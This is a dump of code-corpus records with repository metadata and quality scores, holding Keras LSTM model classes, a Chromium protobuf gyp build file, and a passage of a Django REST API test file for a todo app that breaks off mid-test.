Each record carries the following columns (field name and dtype). Note that every `qsc_*_quality_signal` column is mirrored by a bare `qsc_*` column, which holds a 0/1 value in the records below, followed by the `effective` and `hits` columns.

| field | dtype |
| --- | --- |
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
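The dump itself does not say where these rows are stored or how they are consumed. As a minimal sketch, assuming the records sit in a Parquet shard with exactly these column names, a consumer could load them and filter on the quality signals as follows; the file name and the 0.8 cutoff are illustrative assumptions, not part of the dump:

```python
import pandas as pd

# Hypothetical shard name; the dump does not state the actual file layout.
df = pd.read_parquet("code_shard_0000.parquet")

# Keep Python files that parse as valid ASTs and are not dominated by
# duplicated 5-grams. The 0.8 threshold is an illustrative guess, not a
# documented cutoff.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)
    & (df["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.8)
)
print(df.loc[mask, ["max_stars_repo_name", "size", "hits"]].head())
```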
Record 1:

| field | value |
| --- | --- |
| hexsha | d9a00b2c6f1a0e88ad5b4a7def2a45bd074f417f |
| size | 3,880 |
| ext | py |
| lang | Python |

| event group | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
| --- | --- | --- | --- | --- | --- | --- | --- |
| max_stars | pypagai/models/model_lstm.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | ["Apache-2.0"] | 1 | 2018-07-24T18:53:26.000Z | 2018-07-24T18:53:26.000Z |
| max_issues | pypagai/models/model_lstm.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | ["Apache-2.0"] | 7 | 2020-01-28T21:45:14.000Z | 2022-03-11T23:20:53.000Z |
| max_forks | pypagai/models/model_lstm.py | gcouti/pypagAI | d08fac95361dcc036d890a88cb86ce090322a612 | ["Apache-2.0"] | null | null | null |

content:

```python
from keras import Model, Input
from keras.layers import Dense, concatenate, LSTM, Reshape, Permute, Embedding, Dropout, Convolution1D, Flatten
from keras.optimizers import Adam
from pypagai.models.base import KerasModel
class SimpleLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, cfg):
super().__init__(cfg)
self._cfg_ = cfg
def _create_network_(self):
hidden = self._cfg_['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
conc = concatenate([story, question],)
conc = Reshape((1, int(conc.shape[1])))(conc)
conc = Permute((2, 1))(conc)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
class EmbedLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, cfg):
super().__init__(cfg)
self._cfg_ = cfg
def _create_network_(self):
hidden = self._cfg_['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
eb_story = Embedding(self._vocab_size, 64)(story)
eb_story = Dropout(0.3)(eb_story)
eb_question = Embedding(self._vocab_size, 64)(question)
eb_question = Dropout(0.3)(eb_question)
conc = concatenate([eb_story, eb_question], axis=1)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
class ConvLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, model_cfg):
super().__init__(model_cfg)
self._cfg = model_cfg
def _create_network_(self):
hidden = self._cfg['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
eb_story = Embedding(self._vocab_size, 64)(story)
eb_story = Convolution1D(64, 3, padding='same')(eb_story)
eb_story = Convolution1D(32, 3, padding='same')(eb_story)
eb_story = Convolution1D(16, 3, padding='same')(eb_story)
# eb_story = Flatten()(eb_story)
eb_question = Embedding(self._vocab_size, 64)(question)
eb_question = Convolution1D(64, 3, padding='same')(eb_question)
eb_question = Convolution1D(32, 3, padding='same')(eb_question)
eb_question = Convolution1D(16, 3, padding='same')(eb_question)
# eb_question = Flatten()(eb_question)
conc = concatenate([eb_story, eb_question], axis=1)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
```

Record 1 statistics and quality signals (each raw `*_quality_signal` value paired with its bare flag field):

| avg_line_length | max_line_length | alphanum_fraction | effective | hits |
| --- | --- | --- | --- | --- |
| 33.162393 | 114 | 0.650773 | 0 | 6 |

| signal | *_quality_signal | flag |
| --- | --- | --- |
| qsc_code_num_words | 460 | 0 |
| qsc_code_num_chars | 3,880 | 0 |
| qsc_code_mean_word_length | 5.226087 | 0 |
| qsc_code_frac_words_unique | 0.171739 | null |
| qsc_code_frac_chars_top_2grams | 0.040765 | 0 |
| qsc_code_frac_chars_top_3grams | 0.037854 | 0 |
| qsc_code_frac_chars_top_4grams | 0.034942 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.851498 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.851498 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.835691 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.811564 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.741681 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.741681 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.022069 | 0 |
| qsc_code_frac_chars_whitespace | 0.217526 | 0 |
| qsc_code_size_file_byte | 3,880 | 0 |
| qsc_code_num_lines | 116 | 0 |
| qsc_code_num_chars_line_max | 115 | 0 |
| qsc_code_num_chars_line_mean | 33.448276 | 0 |
| qsc_code_frac_chars_alphabet | 0.769763 | 0 |
| qsc_code_frac_chars_comments | 0.043041 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.694444 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.064648 | 0 |
| qsc_code_frac_chars_long_word_length | 0.025368 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.125 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.055556 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.263889 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
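Record 1 scores above 0.85 on the duplicated-5-gram signal because its three model classes repeat nearly identical boilerplate. The dump does not define how these fractions are computed; the sketch below shows one plausible reading (word-level n-grams, character-weighted coverage of repeated n-grams), so the tokenization and counting rules are assumptions:

```python
from collections import Counter

def frac_chars_dupe_ngrams(text: str, n: int = 5) -> float:
    # Fraction of word characters that fall inside word n-grams occurring
    # more than once. The real pipeline's rules may differ.
    words = text.split()
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)
    covered = [False] * len(words)
    for i, gram in enumerate(ngrams):
        if counts[gram] > 1:
            for j in range(i, i + n):
                covered[j] = True
    total = sum(len(w) for w in words)
    dup = sum(len(w) for w, c in zip(words, covered) if c)
    return dup / total if total else 0.0
```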
Record 2:

| field | value |
| --- | --- |
| hexsha | d9fe73cee8f0ad5d98f81eb365b256cba7970cbe |
| size | 13,093 |
| ext | gyp |
| lang | Python |

| event group | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
| --- | --- | --- | --- | --- | --- | --- | --- |
| max_stars | third_party/protobuf/protobuf.gyp | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | ["BSD-3-Clause"] | 1 | 2015-10-12T09:14:22.000Z | 2015-10-12T09:14:22.000Z |
| max_issues | third_party/protobuf/protobuf.gyp | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | ["BSD-3-Clause"] | null | null | null |
| max_forks | third_party/protobuf/protobuf.gyp | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | ["BSD-3-Clause"] | 1 | 2020-11-04T07:22:28.000Z | 2020-11-04T07:22:28.000Z |

content:

```python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'conditions': [
['OS!="win"', {
'variables': {
'config_h_dir':
'.', # crafted for gcc/linux.
},
}, { # else, OS=="win"
'variables': {
'config_h_dir':
'vsprojects', # crafted for msvc.
},
'target_defaults': {
'msvs_disabled_warnings': [
4018, # signed/unsigned mismatch in comparison
4244, # implicit conversion, possible loss of data
4355, # 'this' used in base member initializer list
],
'defines!': [
'WIN32_LEAN_AND_MEAN', # Protobuf defines this itself.
],
},
}]
],
'targets': [
# The "lite" lib is about 1/7th the size of the heavy lib,
# but it doesn't support some of the more exotic features of
# protobufs, like reflection. To generate C++ code that can link
# against the lite version of the library, add the option line:
#
# option optimize_for = LITE_RUNTIME;
#
# to your .proto file.
{
'target_name': 'protobuf_lite',
'type': '<(library)',
'toolsets': ['host', 'target'],
'sources': [
'src/google/protobuf/stubs/common.h',
'src/google/protobuf/stubs/once.h',
'src/google/protobuf/extension_set.h',
'src/google/protobuf/generated_message_util.h',
'src/google/protobuf/message_lite.h',
'src/google/protobuf/repeated_field.h',
'src/google/protobuf/unknown_field_set.cc',
'src/google/protobuf/unknown_field_set.h',
'src/google/protobuf/wire_format_lite.h',
'src/google/protobuf/wire_format_lite_inl.h',
'src/google/protobuf/io/coded_stream.h',
'src/google/protobuf/io/zero_copy_stream.h',
'src/google/protobuf/io/zero_copy_stream_impl_lite.h',
'src/google/protobuf/stubs/common.cc',
'src/google/protobuf/stubs/once.cc',
'src/google/protobuf/stubs/hash.h',
'src/google/protobuf/stubs/map-util.h',
'src/google/protobuf/stubs/stl_util-inl.h',
'src/google/protobuf/extension_set.cc',
'src/google/protobuf/generated_message_util.cc',
'src/google/protobuf/message_lite.cc',
'src/google/protobuf/repeated_field.cc',
'src/google/protobuf/wire_format_lite.cc',
'src/google/protobuf/io/coded_stream.cc',
'src/google/protobuf/io/coded_stream_inl.h',
'src/google/protobuf/io/zero_copy_stream.cc',
'src/google/protobuf/io/zero_copy_stream_impl_lite.cc',
'<(config_h_dir)/config.h',
],
'include_dirs': [
'<(config_h_dir)',
'src',
],
# This macro must be defined to suppress the use of dynamic_cast<>,
# which requires RTTI.
'defines': [
'GOOGLE_PROTOBUF_NO_RTTI',
],
'direct_dependent_settings': {
'include_dirs': [
'<(config_h_dir)',
'src',
],
'defines': [
'GOOGLE_PROTOBUF_NO_RTTI',
],
},
},
# This is the full, heavy protobuf lib that's needed for c++ .proto's
# that don't specify the LITE_RUNTIME option. The protocol
# compiler itself (protoc) falls into that category.
#
# DO NOT LINK AGAINST THIS TARGET IN CHROME CODE --agl
{
'target_name': 'protobuf_full_do_not_use',
'type': '<(library)',
'toolsets': ['host','target'],
'sources': [
'src/google/protobuf/descriptor.h',
'src/google/protobuf/descriptor.pb.h',
'src/google/protobuf/descriptor_database.h',
'src/google/protobuf/dynamic_message.h',
'src/google/protobuf/generated_message_reflection.h',
'src/google/protobuf/message.h',
'src/google/protobuf/reflection_ops.h',
'src/google/protobuf/service.h',
'src/google/protobuf/text_format.h',
'src/google/protobuf/unknown_field_set.h',
'src/google/protobuf/wire_format.h',
'src/google/protobuf/io/gzip_stream.h',
'src/google/protobuf/io/printer.h',
'src/google/protobuf/io/tokenizer.h',
'src/google/protobuf/io/zero_copy_stream_impl.h',
'src/google/protobuf/compiler/code_generator.h',
'src/google/protobuf/compiler/command_line_interface.h',
'src/google/protobuf/compiler/importer.h',
'src/google/protobuf/compiler/parser.h',
'src/google/protobuf/stubs/strutil.cc',
'src/google/protobuf/stubs/strutil.h',
'src/google/protobuf/stubs/substitute.cc',
'src/google/protobuf/stubs/substitute.h',
'src/google/protobuf/stubs/structurally_valid.cc',
'src/google/protobuf/descriptor.cc',
'src/google/protobuf/descriptor.pb.cc',
'src/google/protobuf/descriptor_database.cc',
'src/google/protobuf/dynamic_message.cc',
'src/google/protobuf/extension_set_heavy.cc',
'src/google/protobuf/generated_message_reflection.cc',
'src/google/protobuf/message.cc',
'src/google/protobuf/reflection_ops.cc',
'src/google/protobuf/service.cc',
'src/google/protobuf/text_format.cc',
'src/google/protobuf/unknown_field_set.cc',
'src/google/protobuf/wire_format.cc',
# This file pulls in zlib, but it's not actually used by protoc, so
# instead of compiling zlib for the host, let's just exclude this.
# 'src/src/google/protobuf/io/gzip_stream.cc',
'src/google/protobuf/io/printer.cc',
'src/google/protobuf/io/tokenizer.cc',
'src/google/protobuf/io/zero_copy_stream_impl.cc',
'src/google/protobuf/compiler/importer.cc',
'src/google/protobuf/compiler/parser.cc',
],
'dependencies': [
'protobuf_lite',
],
'export_dependent_settings': [
'protobuf_lite',
],
},
{
'target_name': 'protoc',
'type': 'executable',
'toolsets': ['host'],
'sources': [
'src/google/protobuf/compiler/code_generator.cc',
'src/google/protobuf/compiler/command_line_interface.cc',
'src/google/protobuf/compiler/plugin.cc',
'src/google/protobuf/compiler/plugin.pb.cc',
'src/google/protobuf/compiler/subprocess.cc',
'src/google/protobuf/compiler/subprocess.h',
'src/google/protobuf/compiler/zip_writer.cc',
'src/google/protobuf/compiler/zip_writer.h',
'src/google/protobuf/compiler/cpp/cpp_enum.cc',
'src/google/protobuf/compiler/cpp/cpp_enum.h',
'src/google/protobuf/compiler/cpp/cpp_enum_field.cc',
'src/google/protobuf/compiler/cpp/cpp_enum_field.h',
'src/google/protobuf/compiler/cpp/cpp_extension.cc',
'src/google/protobuf/compiler/cpp/cpp_extension.h',
'src/google/protobuf/compiler/cpp/cpp_field.cc',
'src/google/protobuf/compiler/cpp/cpp_field.h',
'src/google/protobuf/compiler/cpp/cpp_file.cc',
'src/google/protobuf/compiler/cpp/cpp_file.h',
'src/google/protobuf/compiler/cpp/cpp_generator.cc',
'src/google/protobuf/compiler/cpp/cpp_helpers.cc',
'src/google/protobuf/compiler/cpp/cpp_helpers.h',
'src/google/protobuf/compiler/cpp/cpp_message.cc',
'src/google/protobuf/compiler/cpp/cpp_message.h',
'src/google/protobuf/compiler/cpp/cpp_message_field.cc',
'src/google/protobuf/compiler/cpp/cpp_message_field.h',
'src/google/protobuf/compiler/cpp/cpp_primitive_field.cc',
'src/google/protobuf/compiler/cpp/cpp_primitive_field.h',
'src/google/protobuf/compiler/cpp/cpp_service.cc',
'src/google/protobuf/compiler/cpp/cpp_service.h',
'src/google/protobuf/compiler/cpp/cpp_string_field.cc',
'src/google/protobuf/compiler/cpp/cpp_string_field.h',
'src/google/protobuf/compiler/java/java_enum.cc',
'src/google/protobuf/compiler/java/java_enum.h',
'src/google/protobuf/compiler/java/java_enum_field.cc',
'src/google/protobuf/compiler/java/java_enum_field.h',
'src/google/protobuf/compiler/java/java_extension.cc',
'src/google/protobuf/compiler/java/java_extension.h',
'src/google/protobuf/compiler/java/java_field.cc',
'src/google/protobuf/compiler/java/java_field.h',
'src/google/protobuf/compiler/java/java_file.cc',
'src/google/protobuf/compiler/java/java_file.h',
'src/google/protobuf/compiler/java/java_generator.cc',
'src/google/protobuf/compiler/java/java_helpers.cc',
'src/google/protobuf/compiler/java/java_helpers.h',
'src/google/protobuf/compiler/java/java_message.cc',
'src/google/protobuf/compiler/java/java_message.h',
'src/google/protobuf/compiler/java/java_message_field.cc',
'src/google/protobuf/compiler/java/java_message_field.h',
'src/google/protobuf/compiler/java/java_primitive_field.cc',
'src/google/protobuf/compiler/java/java_primitive_field.h',
'src/google/protobuf/compiler/java/java_service.cc',
'src/google/protobuf/compiler/java/java_service.h',
'src/google/protobuf/compiler/java/java_string_field.cc',
'src/google/protobuf/compiler/java/java_string_field.h',
'src/google/protobuf/compiler/python/python_generator.cc',
'src/google/protobuf/compiler/main.cc',
],
'dependencies': [
'protobuf_full_do_not_use',
],
'include_dirs': [
'<(config_h_dir)',
'src/src',
],
},
{
# Generate the python module needed by all protoc-generated Python code.
'target_name': 'py_proto',
'type': 'none',
'copies': [
{
'destination': '<(PRODUCT_DIR)/pyproto/google/',
'files': [
# google/ module gets an empty __init__.py.
'__init__.py',
],
},
{
'destination': '<(PRODUCT_DIR)/pyproto/google/protobuf',
'files': [
'python/google/protobuf/__init__.py',
'python/google/protobuf/descriptor.py',
'python/google/protobuf/message.py',
'python/google/protobuf/reflection.py',
'python/google/protobuf/service.py',
'python/google/protobuf/service_reflection.py',
'python/google/protobuf/text_format.py',
# TODO(ncarter): protoc's python generator treats descriptor.proto
# specially, but it's not possible to trigger the special treatment
# unless you run protoc from ./src/src (the treatment is based
# on the path to the .proto file matching a constant exactly).
# I'm not sure how to convince gyp to execute a rule from a
# different directory. Until this is resolved, use a copy of
# descriptor_pb2.py that I manually generated.
'descriptor_pb2.py',
],
},
{
'destination': '<(PRODUCT_DIR)/pyproto/google/protobuf/internal',
'files': [
'python/google/protobuf/internal/__init__.py',
'python/google/protobuf/internal/api_implementation.py',
'python/google/protobuf/internal/containers.py',
'python/google/protobuf/internal/cpp_message.py',
'python/google/protobuf/internal/decoder.py',
'python/google/protobuf/internal/encoder.py',
'python/google/protobuf/internal/generator_test.py',
'python/google/protobuf/internal/message_listener.py',
'python/google/protobuf/internal/python_message.py',
'python/google/protobuf/internal/type_checkers.py',
'python/google/protobuf/internal/wire_format.py',
],
},
],
# # We can't generate a proper descriptor_pb2.py -- see earlier comment.
# 'rules': [
# {
# 'rule_name': 'genproto',
# 'extension': 'proto',
# 'inputs': [
# '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)protoc<(EXECUTABLE_SUFFIX)',
# ],
# 'variables': {
# # The protoc compiler requires a proto_path argument with the
# # directory containing the .proto file.
# 'rule_input_relpath': 'src/google/protobuf',
# },
# 'outputs': [
# '<(PRODUCT_DIR)/pyproto/google/protobuf/<(RULE_INPUT_ROOT)_pb2.py',
# ],
# 'action': [
# '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)protoc<(EXECUTABLE_SUFFIX)',
# '-I./src',
# '-I.',
# '--python_out=<(PRODUCT_DIR)/pyproto/google/protobuf',
# 'google/protobuf/descriptor.proto',
# ],
# 'message': 'Generating Python code from <(RULE_INPUT_PATH)',
# },
# ],
# 'dependencies': [
# 'protoc#host',
# ],
# 'sources': [
# 'src/google/protobuf/descriptor.proto',
# ],
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
```

Record 2 statistics and quality signals:

| avg_line_length | max_line_length | alphanum_fraction | effective | hits |
| --- | --- | --- | --- | --- |
| 41.302839 | 81 | 0.621554 | 0 | 6 |

| signal | *_quality_signal | flag |
| --- | --- | --- |
| qsc_code_num_words | 1,560 | 0 |
| qsc_code_num_chars | 13,093 | 0 |
| qsc_code_mean_word_length | 5.064103 | 0 |
| qsc_code_frac_words_unique | 0.186538 | null |
| qsc_code_frac_chars_top_2grams | 0.269367 | 1 |
| qsc_code_frac_chars_top_3grams | 0.273291 | 1 |
| qsc_code_frac_chars_top_4grams | 0.196203 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.700127 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.478734 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0.360633 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0.256582 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0.064937 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0.025949 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.002701 | 0 |
| qsc_code_frac_chars_whitespace | 0.236462 | 0 |
| qsc_code_size_file_byte | 13,093 | 0 |
| qsc_code_num_lines | 316 | 0 |
| qsc_code_num_chars_line_max | 82 | 0 |
| qsc_code_num_chars_line_mean | 41.433544 | 0 |
| qsc_code_frac_chars_alphabet | 0.787536 | 0 |
| qsc_code_frac_chars_comments | 0.21523 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.218107 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.677521 | 1 |
| qsc_code_frac_chars_long_word_length | 0.62348 | 1 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0.003165 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.00823 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.00823 | 0 |
| qsc_codepython_frac_lines_print | 0.00823 | 0 |
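protobuf.gyp trips the top-2/3/4-gram flags: roughly a quarter of its characters sit in the most frequent short n-grams, driven by the endlessly repeated `src/google/protobuf/...` source paths. Assuming the same word-level, character-weighted reading as above, a sketch of the top-n-gram fraction:

```python
from collections import Counter

def frac_chars_top_ngram(text: str, n: int = 2) -> float:
    # Assumed definition: characters covered by the single most common word
    # n-gram, divided by all word characters. The pipeline's exact rule is
    # not documented in this dump and may differ.
    words = text.split()
    if len(words) < n:
        return 0.0
    counts = Counter(tuple(words[i:i + n]) for i in range(len(words) - n + 1))
    gram, freq = counts.most_common(1)[0]
    gram_chars = sum(len(w) for w in gram)
    total_chars = sum(len(w) for w in words)
    return (freq * gram_chars) / total_chars if total_chars else 0.0
```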
Record 3:

| field | value |
| --- | --- |
| hexsha | 8a04ff873e3cd041bc9cad7f7fc7707f7c185cce |
| size | 6,652 |
| ext | py |
| lang | Python |

| event group | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
| --- | --- | --- | --- | --- | --- | --- | --- |
| max_stars | invera/api/tests.py | LeoLeiva/todo-challenge | f6f24f53758eb4e425c91516bcab7af8cad66814 | ["MIT"] | null | null | null |
| max_issues | invera/api/tests.py | LeoLeiva/todo-challenge | f6f24f53758eb4e425c91516bcab7af8cad66814 | ["MIT"] | null | null | null |
| max_forks | invera/api/tests.py | LeoLeiva/todo-challenge | f6f24f53758eb4e425c91516bcab7af8cad66814 | ["MIT"] | 1 | 2021-01-10T20:19:42.000Z | 2021-01-10T20:19:42.000Z |

content:

```python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import inspect
from task.models import InveraTask
from api.utils import send_test_csv_report
from django.contrib.auth.models import User
from rest_framework.test import APIClient, APITestCase
from rest_framework.reverse import reverse
from rest_framework import status
TEST_RESULTS = []
RECIPIENTS = ['email@destino.com']
class TaskListTestCase(APITestCase):
def setUp(self) -> None:
self.user = User.objects.create_user(
username='test_user', password='adminpass')
self.other_user = User.objects.create_user(
username='other_user', password='adminpass')
self.task = InveraTask.objects.create(
userTask=self.user, title='My Initial Task')
self.client = APIClient()
@classmethod
def tearDownClass(cls):
User.objects.filter(username__in=['test_user', 'other_user']).delete()
def test_create_task_with_un_authenticate_user(self):
"""
En este caso de prueba, estamos probando la API Task Create utilizando un usuario no autenticado.
"""
response = self.client.post(
reverse('api-task'), {'title': 'My Task 1'}, format='json')
is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "El usuario no autenticado no puede agregar una tarea a la lista"
})
if is_passed:
